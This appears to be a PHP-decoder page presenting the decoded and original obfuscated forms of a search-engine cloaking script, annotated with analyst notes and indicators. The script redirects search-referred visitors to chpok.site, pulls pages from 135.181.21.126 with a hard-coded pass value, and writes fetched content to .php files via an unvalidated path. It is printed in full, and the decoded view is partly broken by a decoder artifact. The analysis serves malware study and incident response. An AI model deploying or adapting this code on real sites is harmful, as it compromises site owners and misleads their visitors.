
PHP Decode

<?php goto LFSdC; ZEo1P: if ( strpos( $_SERVER["\x48\x54\124\x50\x5f\122\..

Decoded Output download

<?php 
// Analyst notes on the decoded view. The script is flattened with goto: labels run in the
// order the goto statements dictate, not top to bottom. Execution order in this listing:
//   LFSdC -> V5o7v -> A9HzL -> vy5uL -> krSyu -> ETX4l -> l7rkL -> lPr5r -> VkMtz -> BpP3C
//   -> zMbLH -> buFfR -> Jrj2m -> D3y1o -> QJZeV -> KOIk2 -> tcpjB -> bdM4c -> ZEo1P
//   -> V_aKG -> ho7PJ -> RPC3t -> rQTN0 -> LUvBM -> GhrST -> GKjxS -> AQmS_ -> Uf7uS
// What the code does: a request whose Referer mentions google./yahoo./bing. is redirected
// to chpok.site; any other request is answered with a page fetched from 135.181.21.126
// and cached on disk as index/<id>.php. Different content per visitor type is the usual
// shape of search-engine cloaking.
// Indicators visible here: chpok.site, 135.181.21.126, remote script name 696969new.php,
// the index/ cache directory, the fixed MSIE 6.0 User-Agent on outbound requests, and the
// three "apass" fragments that are joined into the pass= parameter.
goto LFSdC; 
// [step 19] Traffic split. strpos() results are used as booleans, so a match at offset 0
// would count as "not found"; a real Referer starts with a scheme, so the test still works.
ZEo1P: 
if ( 
    strpos( 
        $_SERVER["HTTP_REFERER"], 
        "google." 
    ) or 
    strpos( 
        $_SERVER["HTTP_REFERER"], 
        "yahoo." 
    ) or 
    strpos( 
        $_SERVER["HTTP_REFERER"], 
        "bing." 
    ) 
) { 
    // Search-referred visitor: redirect off-site. The URL carries the date tag, this
    // site's host name plus script directory ($s) and the keyword taken from the request.
    header( 
        "Location: https://chpok.site/enter/?mark={$today}-{$s}&engkey={$keyword}" 
    ); 
    die(); 
} else { 
    // The request value is concatenated into the path with no validation, so neither this
    // read nor the later cache write is confined to index/. During incident response,
    // treat *.php files readable by the web server account as potentially disclosed.
    $myname = $_GET["id"] . ".php"; 
    if (file_exists("index/" . $myname)) { 
        // Cache hit: the file is read and echoed, not included.
        $html = @file_get_contents("index/" . $myname); 
        // "> 2" requires the token at offset 3 or later in the User-Agent string.
        if ( 
            strpos( 
                $_SERVER[ 
                    "HTTP_USER_AGENT" 
                ], 
                "bing" 
            ) > 
                2 or 
            strpos( 
                $_SERVER[ 
                    "HTTP_USER_AGENT" 
                ], 
                "yahoo" 
            ) > 
                2 
        ) { 
            // Bing/Yahoo user agents get the keyword placed into an empty title element.
            $keyword = str_replace("-", " ", $_GET["id"]); 
            $html = str_replace( 
                "<title></title>", 
                "<title>{$keyword}</title>", 
                $html 
            ); 
        } 
        echo $html; 
        die(); 
    } 
} 
goto V_aKG; 
// [step 15] Normalise a root directory to an empty string.
// NOTE(review): decoder artifact on the next line. The original string is "\134" (one
// backslash); rendered raw it escapes the closing quote, so this decoded view is not
// valid PHP from here on. Use the original listing for exact semantics.
QJZeV: 
if (($s == "\") | ($s == "/")) { 
    $s = ""; 
} 
goto KOIk2; 
// [step 4] Fixed reply for id == "testing"; presumably a liveness check used by the operator.
vy5uL: 
if ($_GET["id"] == "testing") { 
    echo "test good..."; 
    die(); 
} 
goto krSyu; 
// [step 10] $xx1 is not read anywhere in this listing.
BpP3C: 
$xx1 = 5; 
goto zMbLH; 
// [step 8] First of three fragments joined into $apass at bdM4c.
lPr5r: 
$apass1 = "visdoijew"; 
goto VkMtz; 
// [step 17] Third fragment of $apass.
tcpjB: 
$apass3 = "rv32ydacsvsdv"; 
goto bdM4c; 
// [step 26] Same title injection as the cache-hit path, applied to the freshly fetched page.
GKjxS: 
if ( 
    strpos( 
        $_SERVER[ 
            "HTTP_USER_AGENT" 
        ], 
        "bing" 
    ) > 
        2 or 
    strpos( 
        $_SERVER[ 
            "HTTP_USER_AGENT" 
        ], 
        "yahoo" 
    ) > 
        2 
) { 
    $text = str_replace( 
        "<title></title>", 
        "<title>{$keyword}</title>", 
        $text 
    ); 
} 
goto AQmS_; 
// [step 24] Third fetch attempt, used when the response so far is under 5000 bytes:
// a hand-built HTTP/1.0 request over a raw socket to port 80 of the same host.
LUvBM: 
if (strlen($text) < 5000) { 
    $url = "135.181.21.126"; 
    $fp = fsockopen($url, 80, $errno, $errstr, 30); 
    if (!$fp) { 
        echo "{$errstr} ({$errno})<br />\xa"; 
    } else { 
        $req = 
            "/" . 
            $_GET["fn"] . 
            ".php?pass={$apass}&q={$_GET["id"]}"; 
        // The line breaks inside the next two header strings are decoder renderings of
        // CR/LF escapes in the original.
        $out = "GET {$req} HTTP/1.0\xd\xa"; 
        $out .= "Host: {$url}
\xa"; 
        $out .= 
            "Connection: Close
\xd\xa"; 
        fwrite($fp, $out); 
        while (!feof($fp)) { 
            $text = $text . fgets($fp, 2048); 
        } 
        fclose($fp); 
    } 
    // $out holds the request string at this point, not a stream handle.
    fclose($out); 
    // Keeps only element 7 of the line-split response; presumably this skips the HTTP
    // headers of the raw reply - confirm against a captured response.
    $text = explode("
", $text); 
    $text = $text[7]; 
} 
goto GhrST; 
// [step 21] Start with an empty response buffer.
ho7PJ: 
$text = ""; 
goto RPC3t; 
// [step 1] Entry point: all error output is suppressed, so failures leave no visible trace.
LFSdC: 
error_reporting(0); 
goto V5o7v; 
// [step 12] Spaces to "+" so the keyword can sit in the redirect query string.
buFfR: 
$keyword = str_replace(" ", "+", $keyword); 
goto Jrj2m; 
// [step 5] id == "index" is sent to google.com instead of being processed.
krSyu: 
if ($_GET["id"] == "index") { 
    header( 
        "Location: https://google.com" 
    ); 
    die(); 
} 
goto ETX4l; 
// [step 18] Assemble the pass= value sent to the remote host from the three fragments.
bdM4c: 
$apass = "{$apass1}" . "{$apass2}" . "{$apass3}"; 
goto ZEo1P; 
// [step 2] Hard-coded tag used in the redirect's mark= parameter; it reads like a date.
V5o7v: 
$today = "20231227-"; 
goto A9HzL; 
// [step 3] Every query parameter value is copied over $_GET["id"] in turn, so id ends up
// holding the value of the last parameter, whatever that parameter is called.
A9HzL: 
foreach ($_GET as $a => $b) { 
    $_GET["id"] = $b; 
} 
goto vy5uL; 
// [step 27] Emit the fetched page to the client.
AQmS_: 
echo $text; 
goto Uf7uS; 
// [step 7] "fn" is overwritten with a constant, so the remote script name is fixed and
// not taken from the request.
l7rkL: 
$_GET["fn"] = "696969new"; 
goto lPr5r; 
// [step 9] $x1 is not read anywhere in this listing.
VkMtz: 
$x1 = 3; 
goto BpP3C; 
// [step 14] Directory part of the script's own URL path.
D3y1o: 
$s = dirname($_SERVER["PHP_SELF"]); 
goto QJZeV; 
// [step 13] Second fragment of $apass.
Jrj2m: 
$apass2 = "b23hr23vr32"; 
goto D3y1o; 
// [step 20] Reached only on a cache miss. $query_pars_2 is not read in this listing.
V_aKG: 
$query_pars_2 = str_replace("-", "+", $_GET["id"]); 
goto ho7PJ; 
// [step 6] $_GET["world"] is not read anywhere in this listing.
ETX4l: 
$_GET["world"] = 5; 
goto l7rkL; 
// [step 25] Responses over 5000 bytes are cached. Content supplied by the remote host is
// written under a .php name at a path built from the unvalidated request value; treat
// every file in index/ as attacker-supplied and review it before removal.
GhrST: 
if (strlen($text) > 5000) { 
    $out = fopen("index/" . $myname, "w"); 
    fwrite($out, $text); 
    fclose($out); 
} 
goto GKjxS; 
// [step 23] Second fetch attempt via the http:// stream wrapper, same URL as the cURL
// attempt, used when the response so far is under 5000 bytes.
rQTN0: 
if (strlen($text) < 5000) { 
    $text = file_get_contents( 
        "http://135.181.21.126/" . 
            $_GET["fn"] . 
            ".php?pass={$apass}&q={$_GET["id"]}" 
    ); 
} 
goto LUvBM; 
// [step 16] $s becomes host name plus directory, identifying this site in the redirect.
KOIk2: 
$s = $_SERVER["SERVER_NAME"] . $s; 
goto tcpjB; 
// [step 11] Keyword is the request value with "-" turned into spaces.
zMbLH: 
$keyword = str_replace("-", " ", $_GET["id"]); 
goto buFfR; 
// [step 22] First fetch attempt via cURL, if the extension is loaded. The URL is plain
// http, so the two SSL options below have no effect on this request. The request value
// is appended to q= without URL encoding. The fixed MSIE 6.0 User-Agent is a usable
// signature for outbound requests from the web server.
RPC3t: 
if (function_exists("curl_init")) { 
    $ch = curl_init(); 
    curl_setopt( 
        $ch, 
        CURLOPT_URL, 
        "http://135.181.21.126/" . 
            $_GET["fn"] . 
            ".php?pass={$apass}&q={$_GET["id"]}" 
    ); 
    curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); 
    curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, 4); 
    curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false); 
    curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, 2); 
    curl_setopt( 
        $ch, 
        CURLOPT_USERAGENT, 
        "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)" 
    ); 
    $text = curl_exec($ch); 
    curl_close($ch); 
} 
goto rQTN0; 
// [step 28] End of script.
Uf7uS: ?> 


Original Code

<?php
// Analyst notes on the obfuscated original. Two layers are visible: (1) every string
// literal is written as a mix of octal (\NNN) and hex (\xNN) escapes inside double
// quotes, which PHP resolves at parse time with no eval or decoder function involved;
// (2) control flow is flattened into goto-linked labels with random names.
// For detection, the combination of dense goto labels, escape-only string literals and
// error_reporting(0) is a more durable signal than any single decoded string.
// Execution order in this listing:
//   LFSdC -> V5o7v -> A9HzL -> vy5uL -> krSyu -> ETX4l -> l7rkL -> lPr5r -> VkMtz -> BpP3C
//   -> zMbLH -> buFfR -> Jrj2m -> D3y1o -> QJZeV -> KOIk2 -> tcpjB -> bdM4c -> ZEo1P
//   -> V_aKG -> ho7PJ -> RPC3t -> rQTN0 -> LUvBM -> GhrST -> GKjxS -> AQmS_ -> Uf7uS
goto LFSdC;
// Traffic split. The three $_SERVER keys decode to HTTP_REFERER; the needles decode to
// "google.", "yahoo." and "bing.". A match leads to the redirect below.
ZEo1P:
if (
    strpos(
        $_SERVER["\x48\x54\124\x50\x5f\122\x45\106\x45\x52\105\122"],
        "\147\157\157\147\x6c\145\x2e"
    ) or
    strpos(
        $_SERVER["\110\x54\x54\x50\137\x52\x45\x46\x45\x52\105\x52"],
        "\171\x61\x68\x6f\x6f\56"
    ) or
    strpos(
        $_SERVER["\110\124\124\120\x5f\122\105\x46\105\x52\105\122"],
        "\142\x69\x6e\x67\56"
    )
) {
    // Decodes to a Location header for https://chpok.site/enter/ with mark= and engkey=
    // parameters filled from $today, $s and $keyword.
    header(
        "\114\157\x63\x61\x74\x69\157\x6e\72\x20\x68\x74\x74\160\x73\x3a\x2f\57\x63\150\x70\x6f\153\x2e\163\x69\164\145\x2f\145\156\x74\x65\162\x2f\77\x6d\141\x72\153\x3d{$today}\x2d{$s}\46\x65\156\x67\x6b\145\171\75{$keyword}"
    );
    die();
} else {
    // Key decodes to "id", suffix to ".php", directory to "index/". The request value is
    // joined into the path with no validation, so the read is not confined to index/.
    $myname = $_GET["\x69\x64"] . "\56\160\150\160";
    if (file_exists("\151\156\144\x65\170\57" . $myname)) {
        // Cached page is read and echoed, not included.
        $html = @file_get_contents("\x69\x6e\144\145\170\x2f" . $myname);
        // Keys decode to HTTP_USER_AGENT; needles to "bing" and "yahoo". "> 2" requires
        // the token at offset 3 or later.
        if (
            strpos(
                $_SERVER[
                    "\x48\x54\x54\120\x5f\x55\x53\105\122\137\101\107\105\x4e\x54"
                ],
                "\x62\151\x6e\x67"
            ) >
                2 or
            strpos(
                $_SERVER[
                    "\110\124\124\120\x5f\125\x53\x45\122\x5f\x41\107\x45\x4e\x54"
                ],
                "\171\x61\150\157\157"
            ) >
                2
        ) {
            // Fills an empty title element with the keyword for those user agents.
            $keyword = str_replace("\x2d", "\40", $_GET["\x69\144"]);
            $html = str_replace(
                "\x3c\x74\151\x74\154\x65\76\x3c\57\164\x69\164\154\x65\x3e",
                "\x3c\164\151\x74\154\145\76{$keyword}\74\x2f\x74\x69\x74\x6c\x65\x3e",
                $html
            );
        }
        echo $html;
        die();
    }
}
goto V_aKG;
// "\134" is a backslash and "\57" a forward slash: a root directory becomes "".
QJZeV:
if (($s == "\134") | ($s == "\57")) {
    $s = "";
}
goto KOIk2;
// Decodes to: id == "testing" prints "test good..." and stops; presumably a liveness check.
vy5uL:
if ($_GET["\151\x64"] == "\x74\145\x73\x74\151\x6e\147") {
    echo "\x74\x65\x73\164\x20\147\x6f\157\144\56\x2e\x2e";
    die();
}
goto krSyu;
// $xx1 is not read anywhere in this listing.
BpP3C:
$xx1 = 5;
goto zMbLH;
// First of three fragments joined into $apass at bdM4c.
lPr5r:
$apass1 = "\x76\151\163\144\x6f\151\x6a\145\x77";
goto VkMtz;
// Third fragment of $apass.
tcpjB:
$apass3 = "\162\x76\63\62\x79\x64\141\x63\x73\x76\163\144\x76";
goto bdM4c;
// Title injection for bing/yahoo user agents, applied to the freshly fetched page.
GKjxS:
if (
    strpos(
        $_SERVER[
            "\x48\124\124\120\x5f\x55\x53\x45\122\137\x41\107\105\x4e\x54"
        ],
        "\x62\x69\156\x67"
    ) >
        2 or
    strpos(
        $_SERVER[
            "\x48\124\x54\120\137\x55\x53\x45\x52\x5f\101\107\105\116\124"
        ],
        "\171\141\x68\157\x6f"
    ) >
        2
) {
    $text = str_replace(
        "\74\x74\x69\x74\154\145\x3e\x3c\57\164\x69\164\x6c\x65\76",
        "\x3c\x74\x69\164\x6c\145\x3e{$keyword}\74\57\x74\x69\164\154\145\x3e",
        $text
    );
}
goto AQmS_;
// Third fetch attempt over a raw socket, used when the response so far is under 5000
// bytes. $url decodes to 135.181.21.126; the request is a hand-built HTTP/1.0 GET with
// Host and Connection: Close headers.
LUvBM:
if (strlen($text) < 5000) {
    $url = "\61\63\65\x2e\x31\x38\x31\x2e\x32\x31\56\x31\x32\x36";
    $fp = fsockopen($url, 80, $errno, $errstr, 30);
    if (!$fp) {
        echo "{$errstr}\40\x28{$errno}\51\74\x62\x72\x20\x2f\76\xa";
    } else {
        // Path decodes to "/" . fn . ".php?pass=<apass>&q=<id>".
        $req =
            "\57" .
            $_GET["\146\156"] .
            "\56\x70\150\x70\77\160\141\x73\163\x3d{$apass}\x26\161\x3d{$_GET["\x69\x64"]}";
        $out = "\x47\105\x54\40{$req}\x20\110\124\x54\120\x2f\61\56\x30\xd\xa";
        $out .= "\110\x6f\163\164\x3a\x20{$url}\15\xa";
        $out .=
            "\x43\157\x6e\156\x65\143\164\x69\x6f\156\x3a\40\103\x6c\157\x73\x65\15\12\xd\xa";
        fwrite($fp, $out);
        while (!feof($fp)) {
            $text = $text . fgets($fp, 2048);
        }
        fclose($fp);
    }
    // $out holds the request string at this point, not a stream handle.
    fclose($out);
    // Splits on LF and keeps element 7 only; presumably this skips the HTTP headers of
    // the raw reply - confirm against a captured response.
    $text = explode("\12", $text);
    $text = $text[7];
}
goto GhrST;
// Start with an empty response buffer.
ho7PJ:
$text = "";
goto RPC3t;
// Entry point: all error output is suppressed.
LFSdC:
error_reporting(0);
goto V5o7v;
// Spaces in the keyword become "+".
buFfR:
$keyword = str_replace("\x20", "\53", $keyword);
goto Jrj2m;
// Decodes to: id == "index" is redirected to https://google.com.
krSyu:
if ($_GET["\x69\144"] == "\x69\x6e\144\145\x78") {
    header(
        "\x4c\157\x63\x61\x74\151\157\156\72\x20\150\164\x74\x70\x73\x3a\x2f\x2f\x67\157\157\x67\x6c\145\x2e\x63\x6f\155"
    );
    die();
}
goto ETX4l;
// Assemble the pass= value sent to the remote host from the three fragments.
bdM4c:
$apass = "{$apass1}" . "{$apass2}" . "{$apass3}";
goto ZEo1P;
// Decodes to "20231227-"; used as the tag in the redirect's mark= parameter.
V5o7v:
$today = "\x32\x30\x32\63\61\x32\62\x37\55";
goto A9HzL;
// Every query parameter value is copied over $_GET["id"] in turn, so id ends up holding
// the value of the last parameter, whatever that parameter is called.
A9HzL:
foreach ($_GET as $a => $b) {
    $_GET["\151\x64"] = $b;
}
goto vy5uL;
// Emit the fetched page to the client.
AQmS_:
echo $text;
goto Uf7uS;
// Key decodes to "fn", value to "696969new": the remote script name is a constant and
// not taken from the request.
l7rkL:
$_GET["\x66\156"] = "\x36\71\66\71\x36\x39\x6e\x65\167";
goto lPr5r;
// $x1 is not read anywhere in this listing.
VkMtz:
$x1 = 3;
goto BpP3C;
// Key decodes to PHP_SELF: directory part of the script's own URL path.
D3y1o:
$s = dirname($_SERVER["\120\x48\x50\137\123\105\x4c\x46"]);
goto QJZeV;
// Second fragment of $apass.
Jrj2m:
$apass2 = "\x62\x32\63\x68\x72\x32\x33\166\162\63\x32";
goto D3y1o;
// Reached only on a cache miss. $query_pars_2 is not read in this listing.
V_aKG:
$query_pars_2 = str_replace("\55", "\x2b", $_GET["\x69\x64"]);
goto ho7PJ;
// Key decodes to "world"; the value is not read anywhere in this listing.
ETX4l:
$_GET["\167\157\162\154\x64"] = 5;
goto l7rkL;
// Responses over 5000 bytes are cached. Path decodes to "index/" . $myname, mode to "w".
// Content supplied by the remote host is written under a .php name at a path built from
// the unvalidated request value; treat every file in index/ as attacker-supplied.
GhrST:
if (strlen($text) > 5000) {
    $out = fopen("\151\156\144\145\x78\57" . $myname, "\x77");
    fwrite($out, $text);
    fclose($out);
}
goto GKjxS;
// Second fetch attempt via the http:// stream wrapper; the URL decodes to
// http://135.181.21.126/<fn>.php?pass=<apass>&q=<id>.
rQTN0:
if (strlen($text) < 5000) {
    $text = file_get_contents(
        "\150\164\164\x70\x3a\57\x2f\61\x33\x35\x2e\61\70\x31\x2e\x32\x31\56\61\62\x36\x2f" .
            $_GET["\x66\x6e"] .
            "\x2e\160\150\x70\x3f\x70\x61\163\x73\75{$apass}\46\161\x3d{$_GET["\x69\x64"]}"
    );
}
goto LUvBM;
// Key decodes to SERVER_NAME: $s becomes host name plus directory.
KOIk2:
$s = $_SERVER["\123\105\x52\126\x45\122\137\x4e\x41\x4d\105"] . $s;
goto tcpjB;
// Keyword is the request value with "-" turned into spaces.
zMbLH:
$keyword = str_replace("\55", "\x20", $_GET["\x69\x64"]);
goto buFfR;
// First fetch attempt via cURL; the function name checked decodes to curl_init. The URL
// is plain http to 135.181.21.126, so the two SSL options have no effect on it. The
// User-Agent decodes to "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)", a
// usable signature for outbound requests from the web server.
RPC3t:
if (function_exists("\143\165\x72\154\x5f\151\x6e\151\164")) {
    $ch = curl_init();
    curl_setopt(
        $ch,
        CURLOPT_URL,
        "\150\x74\164\x70\72\x2f\57\x31\63\65\x2e\61\x38\x31\56\62\x31\56\61\x32\x36\57" .
            $_GET["\146\x6e"] .
            "\56\x70\x68\160\77\x70\x61\x73\163\x3d{$apass}\46\161\x3d{$_GET["\x69\x64"]}"
    );
    curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
    curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, 4);
    curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);
    curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, 2);
    curl_setopt(
        $ch,
        CURLOPT_USERAGENT,
        "\115\x6f\172\151\154\x6c\x61\57\x34\56\x30\40\50\x63\x6f\x6d\160\141\164\x69\142\x6c\145\x3b\x20\x4d\x53\111\105\40\66\x2e\x30\x3b\40\127\151\x6e\144\x6f\x77\163\40\x4e\x54\x20\x35\x2e\x31\x3b\40\123\126\x31\51"
    );
    $text = curl_exec($ch);
    curl_close($ch);
}
goto rQTN0;
// End of script.
Uf7uS: ?>

Function Calls

None

Variables

None

Stats

MD5 7bb34ff41c48f5f66c9ffd2d283a4bf1
Eval Count 0
Decode Time 66 ms